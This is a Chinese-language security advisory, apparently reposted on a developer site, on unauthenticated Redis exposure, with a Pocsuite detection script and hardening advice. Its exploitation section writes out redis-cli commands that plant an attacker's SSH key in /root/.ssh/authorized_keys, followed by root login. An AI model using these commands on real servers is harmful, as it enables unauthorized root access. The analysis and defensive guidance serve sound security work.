前言
Redis是一個開源的使用ANSI C語言編寫�����、支持網(wǎng)絡(luò)����、可基于內(nèi)存亦可持久化的日志型���、Key-Value數(shù)據(jù)庫�,并提供多種語言的API���。
Redis 未授權(quán)訪問的問題是一直存在的問題��,知道創(chuàng)宇安全研究團隊歷史上也做過相關(guān)的應(yīng)急�,今日,又出現(xiàn) Redis 未授權(quán)訪問配合 SSH key 文件被利用的情況����,導(dǎo)致一大批 Redis 服務(wù)器被黑,今天我們來簡要的分析下��。
一�、漏洞概述
Redis 默認情況下,會綁定在 0.0.0.0:6379��,這樣將會將 Redis 服務(wù)暴露到公網(wǎng)上�����,如果在沒有開啟認證的情況下��,可以導(dǎo)致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問 Redis 以及讀取 Redis 的數(shù)據(jù)�。攻擊者在未授權(quán)訪問 Redis 的情況下可以利用 Redis 的相關(guān)方法�����,可以成功在 Redis 服務(wù)器上寫入公鑰��,進而可以使用對應(yīng)私鑰直接登錄目標服務(wù)器���。
1����、漏洞描述
Redis 安全模型的觀念是: “請不要將 Redis 暴露在公開網(wǎng)絡(luò)中, 因為讓不受信任的客戶接觸到 Redis 是非常危險的” 。
Redis 作者之所以放棄解決未授權(quán)訪問導(dǎo)致的不安全性是因為, 99.99% 使用 Redis 的場景都是在沙盒化的環(huán)境中, 為了0.01%的可能性增加安全規(guī)則的同時也增加了復(fù)雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設(shè)計哲學(xué)中仍是不劃算的����。
因為其他受信任用戶需要使用 Redis 或者因為運維人員的疏忽等原因,部分 Redis 綁定在 0.0.0.0:6379�,并且沒有開啟認證(這是Redis 的默認配置),如果沒有進行采用相關(guān)的策略����,比如添加防火墻規(guī)則避免其他非信任來源 ip 訪問等,將會導(dǎo)致 Redis 服務(wù)直接暴露在公網(wǎng)上��,導(dǎo)致其他用戶可以直接在非授權(quán)情況下直接訪問Redis服務(wù)并進行相關(guān)操作����。
利用 Redis 自身的提供的 config 命令,可以進行寫文件操作�,攻擊者可以成功將自己的公鑰寫入目標服務(wù)器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接使用對應(yīng)的私鑰登錄目標服務(wù)器�����。
2、漏洞影響
Redis 暴露在公網(wǎng)(即綁定在0.0.0.0:6379��,目標IP公網(wǎng)可訪問)���,并且沒有開啟相關(guān)認證和添加相關(guān)安全策略情況下可受影響而導(dǎo)致被利用�����。
通過ZoomEye 的搜索結(jié)果顯示�,有97707在公網(wǎng)可以直接訪問的Redis服務(wù)�。
根據(jù) ZoomEye 的探測,全球無驗證可直接利用Redis 分布情況如下:
全球無驗證可直接利用Redis TOP 10國家與地區(qū):
3�、漏洞分析與利用
首先在本地生產(chǎn)公私鑰文件:
然后將公鑰寫入 foo.txt 文件
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
再連接 Redis 寫入文件
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK
這樣就可以成功的將自己的公鑰寫入 /root/.ssh 文件夾的 authotrized_keys 文件里,然后攻擊者直接執(zhí)行:
$ ssh –i id_rsa root@192.168.1.11
即可遠程利用自己的私鑰登錄該服務(wù)器���。
當(dāng)然���,寫入的目錄不限于 /root/.ssh 下的authorized_keys���,也可以寫入用戶目錄�����,不過 Redis 很多以 root 權(quán)限運行�����,所以寫入 root 目錄下��,可以跳過猜用戶的步驟�。
4、Redis 未授權(quán)的其他危害與利用
a)數(shù)據(jù)庫數(shù)據(jù)泄露
Redis 作為數(shù)據(jù)庫����,保存著各種各樣的數(shù)據(jù),如果存在未授權(quán)訪問的情況���,將會導(dǎo)致數(shù)據(jù)的泄露�,其中包含保存的用戶信息等���。
b)代碼執(zhí)行
Redis可以嵌套Lua腳本的特性將會導(dǎo)致代碼執(zhí)行, 危害同其他服務(wù)器端的代碼執(zhí)行, 樣例如下 一旦攻擊者能夠在服務(wù)器端執(zhí)行任意代碼, 攻擊方式將會變得多且復(fù)雜, 這是非常危險的.
通過Lua代碼攻擊者可以調(diào)用 redis.sha1hex() 函數(shù)�����,惡意利用 Redis 服務(wù)器進行 SHA-1 的破解�。
c)敏感信息泄露
通過 Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊����。
可以看到泄露了很多 Redis 服務(wù)器的信息, 有當(dāng)前 Redis 版本, 內(nèi)存運行狀態(tài), 服務(wù)端個數(shù)等等敏感信息�����。
5���、漏洞驗證
可以使用Pocsuite(http://github.com/knownsec/pocsuite)執(zhí)行以下的代碼可以用于測試目標地址是否存在未授權(quán)的Redis服務(wù)。
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import socket
import urlparse
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '89339'
version = '1'
author = ['Anonymous']
vulDate = '2015-10-26'
createDate = '2015-10-26'
updateDate = '2015-10-26'
references = ['http://sebug.net/vuldb/ssvid-89339']
name = 'Redis 未授權(quán)訪問 PoC'
appPowerLink = 'http://redis.io/'
appName = 'Redis'
appVersion = 'All'
vulType = 'Unauthorized access'
desc = '''
redis 默認不需要密碼即可訪問�,黑客直接訪問即可獲取數(shù)據(jù)庫中所有信息,造成嚴重的信息泄露�����。
'''
samples = ['']
def _verify(self):
result = {}
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s = socket.socket()
socket.setdefaulttimeout(10)
try:
host = urlparse.urlparse(self.url).netloc
port = 6379
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
if recvdata and 'redis_version' in recvdata:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Port'] = port
except:
pass
s.close()
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
二�、安全建議
配置bind選項,限定可以連接Redis服務(wù)器的IP����,修改 Redis 的默認端口6379
配置認證,也就是AUTH���,設(shè)置密碼,密碼會以明文方式保存在Redis配置文件中
配置rename-command 配置項 “RENAME_CONFIG”���,這樣即使存在未授權(quán)訪問�����,也能夠給攻擊者使用config 指令加大難度
好消息是Redis作者表示將會開發(fā)”real user”���,區(qū)分普通用戶和admin權(quán)限����,普通用戶將會被禁止運行某些命令���,如config
總結(jié)
以上就是這篇文章的全部內(nèi)容了�,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值�,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持���。
您可能感興趣的文章:- Redis批量刪除KEY的方法
- Redis教程(七):Key操作命令詳解
- Redis獲取某個前綴的key腳本實例
- redis數(shù)據(jù)庫查找key在內(nèi)存中的位置的方法
- 關(guān)于使用key/value數(shù)據(jù)庫redis和TTSERVER的心得體會
- 關(guān)于redis Key淘汰策略的實現(xiàn)方法
- Redis獲取某個大key值的腳本實例
- redis 用scan指令 代替keys指令(詳解)
- redis中熱key問題該如何解決
